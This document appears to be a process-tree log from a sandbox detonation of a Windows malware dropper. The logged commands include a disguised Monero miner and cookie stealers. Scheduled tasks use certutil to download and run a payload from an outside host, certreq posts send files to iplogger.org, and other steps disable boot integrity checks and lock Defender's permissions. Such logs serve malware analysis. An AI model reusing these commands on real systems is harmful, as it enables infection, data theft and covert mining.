        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5056 /prefetch:8
        20⤵
        
        PID:5908
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5588 /prefetch:8
        20⤵
        
        PID:6784
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4516 /prefetch:1
        20⤵
        
        PID:6936
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5320 /prefetch:8
        20⤵
        
        PID:6172
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3272 /prefetch:8
        20⤵
        
        PID:5124
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3340 /prefetch:8
        20⤵
        
        PID:2928
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6200 /prefetch:8
        20⤵
        
        PID:6992
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1084 /prefetch:8
        20⤵
        
        PID:4404
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5024 /prefetch:8
        20⤵
        
        PID:5232
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
        20⤵
        
        PID:6184
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6524 /prefetch:8
        20⤵
        
        PID:3140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6684 /prefetch:8
        20⤵
        
        PID:7128
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2432 /prefetch:2
        20⤵
        
        PID:6752
        
        C:\Windows\regedit.exe
        
        regedit /s chrome-set.reg
        16⤵
        Runs .reg file with regedit
        
        PID:964
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
        
        parse.exe -f json -b firefox
        16⤵
        
        PID:5220
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
        
        parse.exe -f json -b chrome
        16⤵
        
        PID:6176
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
        
        parse.exe -f json -b edge
        16⤵
        
        PID:7096
        
        C:\Users\Admin\AppData\Local\Temp\is-90209.tmp\DataFinder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-90209.tmp\DataFinder.exe" /Verysilent
        12⤵
        
        PID:6192
        
        C:\Users\Admin\Services.exe
        
        "C:\Users\Admin\Services.exe"
        13⤵
        
        PID:3092
        
        C:\Windows\System32\svchost.exe
        
        C:\Windows\System32\svchost.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=0 --nicehash --tls --unam-stealth
        14⤵
        
        PID:7096
        
        C:\Users\Admin\AppData\Local\Temp\is-90209.tmp\Delta.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-90209.tmp\Delta.exe" /Verysilent
        12⤵
        
        PID:5312
        
        C:\Users\Admin\AppData\Local\Temp\is-NDJFA.tmp\Delta.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-NDJFA.tmp\Delta.tmp" /SL5="$60438,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-90209.tmp\Delta.exe" /Verysilent
        13⤵
        
        PID:4380
        
        C:\Users\Admin\AppData\Local\Temp\is-KIVUO.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-KIVUO.tmp\Setup.exe" /VERYSILENT
        14⤵
        
        PID:5024
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & erase C:\Users\Admin\AppData\Local\Temp\is-KIVUO.tmp\Setup.exe & exit
        15⤵
        
        PID:6324
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Setup.exe /f
        16⤵
        Kills process with taskkill
        
        PID:7020
        
        C:\Users\Admin\AppData\Local\Temp\is-90209.tmp\zznote.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-90209.tmp\zznote.exe" /Verysilent
        12⤵
        
        PID:180
        
        C:\Users\Admin\AppData\Local\Temp\is-6IDD9.tmp\zznote.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-6IDD9.tmp\zznote.tmp" /SL5="$70438,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-90209.tmp\zznote.exe" /Verysilent
        13⤵
        
        PID:3416
        
        C:\Users\Admin\AppData\Local\Temp\is-V1IRJ.tmp\jg4_4jaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-V1IRJ.tmp\jg4_4jaa.exe" /silent
        14⤵
        
        PID:6968
        
        C:\Users\Admin\AppData\Local\Temp\is-90209.tmp\hjjgaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-90209.tmp\hjjgaa.exe" /Verysilent
        12⤵
        
        PID:5380
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        
        PID:1864
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\d5gtmygx0s2\wrsdxhed4r4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\d5gtmygx0s2\wrsdxhed4r4.exe" 57a764d042bf8
        8⤵
        
        PID:4532
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k "C:\Program Files\4KYA7VU0QO\4KYA7VU0Q.exe" 57a764d042bf8 & exit
        9⤵
        
        PID:1804
        
        C:\Program Files\4KYA7VU0QO\4KYA7VU0Q.exe
        
        "C:\Program Files\4KYA7VU0QO\4KYA7VU0Q.exe" 57a764d042bf8
        10⤵
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\giqgaca2k4c\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\giqgaca2k4c\vpn.exe" /silent /subid=482
        8⤵
        
        PID:2488
        
        C:\Users\Admin\AppData\Local\Temp\qnsmlguyad1\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qnsmlguyad1\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\is-N4C8V.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-N4C8V.tmp\IBInstaller_97039.tmp" /SL5="$3032E,14464800,721408,C:\Users\Admin\AppData\Local\Temp\qnsmlguyad1\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        9⤵
        
        PID:5140
        
        C:\Users\Admin\AppData\Local\Temp\i5hazgjd3cs\chashepro3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\i5hazgjd3cs\chashepro3.exe" /VERYSILENT
        8⤵
        
        PID:4772
        
        C:\Users\Admin\AppData\Local\Temp\sui2utqxqhw\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sui2utqxqhw\app.exe" /8-23
        8⤵
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\AmhuHGFpBMpowauBmnvCPTY\kdu.exe
        
        C:\Users\Admin\AppData\Local\Temp\AmhuHGFpBMpowauBmnvCPTY\kdu.exe -map C:\Users\Admin\AppData\Local\Temp\AmhuHGFpBMpowauBmnvCPTY\driver.sys
        9⤵
        
        PID:6452
        
        C:\Users\Admin\AppData\Local\Temp\sui2utqxqhw\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sui2utqxqhw\app.exe" /8-23
        9⤵
        
        PID:5272
        
        C:\Users\Admin\AppData\Local\Temp\KtOURmKpOEZOWEVerg\kdu.exe
        
        C:\Users\Admin\AppData\Local\Temp\KtOURmKpOEZOWEVerg\kdu.exe -map C:\Users\Admin\AppData\Local\Temp\KtOURmKpOEZOWEVerg\driver.sys
        10⤵
        
        PID:6000
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        10⤵
        
        PID:5088
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        11⤵
        
        PID:3196
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe /8-23
        10⤵
        
        PID:1576
        
        C:\Users\Admin\AppData\Local\Temp\sBcmorVqBnjbDbtYnVyBTWE\kdu.exe
        
        C:\Users\Admin\AppData\Local\Temp\sBcmorVqBnjbDbtYnVyBTWE\kdu.exe -map C:\Users\Admin\AppData\Local\Temp\sBcmorVqBnjbDbtYnVyBTWE\driver.sys
        11⤵
        
        PID:4676
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        11⤵
        Creates scheduled task(s)
        
        PID:6632
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        11⤵
        Creates scheduled task(s)
        
        PID:5520
        
        C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        11⤵
        
        PID:5836
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:7092
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6132
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:7024
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:4464
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6820
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6100
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6596
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:4636
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:2168
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:4768
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6308
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:5864
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:2120
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:5660
        
        C:\Windows\System32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:2928
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        11⤵
        
        PID:5776
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        11⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        12⤵
        
        PID:5184
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        13⤵
        
        PID:6988
        
        C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
        11⤵
        
        PID:4676
        
        C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
        11⤵
        
        PID:5156
        
        C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
        11⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\gjswyaozzyz\55tzellixpk.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gjswyaozzyz\55tzellixpk.exe" testparams
        8⤵
        
        PID:5088
        
        C:\Users\Admin\AppData\Roaming\bwmr1yofkup\x5z4qpn321u.exe
        
        "C:\Users\Admin\AppData\Roaming\bwmr1yofkup\x5z4qpn321u.exe" /VERYSILENT /p=testparams
        9⤵
        
        PID:5152
        
        C:\Users\Admin\AppData\Local\Temp\is-8Q4P2.tmp\x5z4qpn321u.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8Q4P2.tmp\x5z4qpn321u.tmp" /SL5="$40250,1611272,61440,C:\Users\Admin\AppData\Roaming\bwmr1yofkup\x5z4qpn321u.exe" /VERYSILENT /p=testparams
        10⤵
        
        PID:2424
        
        C:\Users\Admin\AppData\Local\Temp\0dqkhjwyomq\sux2euike4h.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0dqkhjwyomq\sux2euike4h.exe" /ustwo INSTALL
        8⤵
        
        PID:3984
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3984 -s 648
        9⤵
        Program crash
        
        PID:5688
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3984 -s 660
        9⤵
        Program crash
        
        PID:5912
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3984 -s 624
        9⤵
        Program crash
        
        PID:5984
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3984 -s 680
        9⤵
        Program crash
        
        PID:6056
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3984 -s 884
        9⤵
        Program crash
        
        PID:5608
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3984 -s 928
        9⤵
        Program crash
        
        PID:5828
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3984 -s 1176
        9⤵
        Program crash
        
        PID:2720
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3984 -s 1188
        9⤵
        Program crash
        
        PID:5848
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3984 -s 1304
        9⤵
        Program crash
        
        PID:6080
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3984 -s 1296
        9⤵
        Program crash
        
        PID:5876
        
        C:\Users\Admin\AppData\Local\Temp\tpzo2oxt3x1\setup_10.2_us3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tpzo2oxt3x1\setup_10.2_us3.exe" /silent
        8⤵
        
        PID:552
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      PID:1176
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
      4⤵
      PID:4372
    - - C:\ProgramData\8754965.96
        
        "C:\ProgramData\8754965.96"
        5⤵
        
        PID:2148
    - - C:\ProgramData\5213890.57
        
        "C:\ProgramData\5213890.57"
        5⤵
        
        PID:1768
      - C:\ProgramData\Windows Host\Windows Host.exe
        
        "C:\ProgramData\Windows Host\Windows Host.exe"
        6⤵
        
        PID:860
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
      4⤵
      PID:4568
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:5240
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:5580
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
      4⤵
      PID:5556
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:3512
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:5740

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4640
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 76A9B1D4E8D26659EE9F7787E4DA3326 C
  2⤵
  - Loads dropped DLL
  PID:3148
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:6148

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3560

C:\Users\Admin\AppData\Local\Temp\is-M1256.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M1256.tmp\chashepro3.tmp" /SL5="$102D8,3362400,58368,C:\Users\Admin\AppData\Local\Temp\i5hazgjd3cs\chashepro3.exe" /VERYSILENT
1⤵
PID:3684
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1hTS97"
  2⤵
  PID:988
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c "start https://iplogger.org/1EaGq7"
  2⤵
  PID:856
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
  2⤵
  PID:1692
- C:\Program Files (x86)\JCleaner\ww.exe
  "C:\Program Files (x86)\JCleaner\ww.exe"
  2⤵
  PID:4492
- - C:\Program Files (x86)\JCleaner\ww.exe
    "C:\Program Files (x86)\JCleaner\ww.exe"
    3⤵
    PID:3168
- C:\Program Files (x86)\JCleaner\jayson.exe
  "C:\Program Files (x86)\JCleaner\jayson.exe"
  2⤵
  PID:720
- - C:\Program Files (x86)\JCleaner\jayson.exe
    "C:\Program Files (x86)\JCleaner\jayson.exe"
    3⤵
    - Executes dropped EXE
    PID:556
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c "start https://iplogger.org/1aSny7"
  2⤵
  PID:4832
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
  2⤵
  PID:4484
- - C:\Windows\SysWOW64\certreq.exe
    certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
    3⤵
    PID:5504
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
  2⤵
  PID:4932
- - C:\Windows\SysWOW64\certreq.exe
    certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
    3⤵
    PID:5496
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
  2⤵
  PID:4664
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c certreq -post -config https://iplogger.org/1hTS97 %windir%\\win.ini %temp%\\2 & del %temp%\\2
  2⤵
  PID:1304
- - C:\Windows\SysWOW64\certreq.exe
    certreq -post -config https://iplogger.org/1hTS97 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
    3⤵
    PID:5480
- C:\Program Files (x86)\JCleaner\gl.exe
  "C:\Program Files (x86)\JCleaner\gl.exe"
  2⤵
  PID:1988
- - C:\Program Files (x86)\JCleaner\gl.exe
    "C:\Program Files (x86)\JCleaner\gl.exe"
    3⤵
    PID:4032

C:\Users\Admin\AppData\Local\Temp\is-63SKF.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-63SKF.tmp\vpn.tmp" /SL5="$10304,15170975,270336,C:\Users\Admin\AppData\Local\Temp\giqgaca2k4c\vpn.exe" /silent /subid=482
1⤵
PID:1592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
  2⤵
  PID:4184
- - C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
    tapinstall.exe remove tap0901
    3⤵
    PID:4544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
  2⤵
  PID:6708
- - C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
    tapinstall.exe install OemVista.inf tap0901
    3⤵
    PID:5304
- C:\Program Files (x86)\MaskVPN\mask_svc.exe
  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
  2⤵
  PID:4796
- C:\Program Files (x86)\MaskVPN\mask_svc.exe
  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
  2⤵
  PID:5780

C:\Program Files (x86)\DTS\seed.sfx.exe
"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s1
1⤵
PID:4020
- C:\Program Files (x86)\Seed Trade\Seed\seed.exe
  "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
  2⤵
  PID:6140

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1Gusg7"
1⤵
PID:3960

C:\Users\Admin\AppData\Local\Temp\is-1615Q.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-1615Q.tmp\{app}\chrome_proxy.exe"
1⤵
PID:5352
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-1615Q.tmp\{app}\chrome_proxy.exe"
  2⤵
  PID:2176
- - C:\Windows\SysWOW64\PING.EXE
    ping localhost -n 4
    3⤵
    - Runs ping.exe
    PID:5200

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://dropskeyssellbuy.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
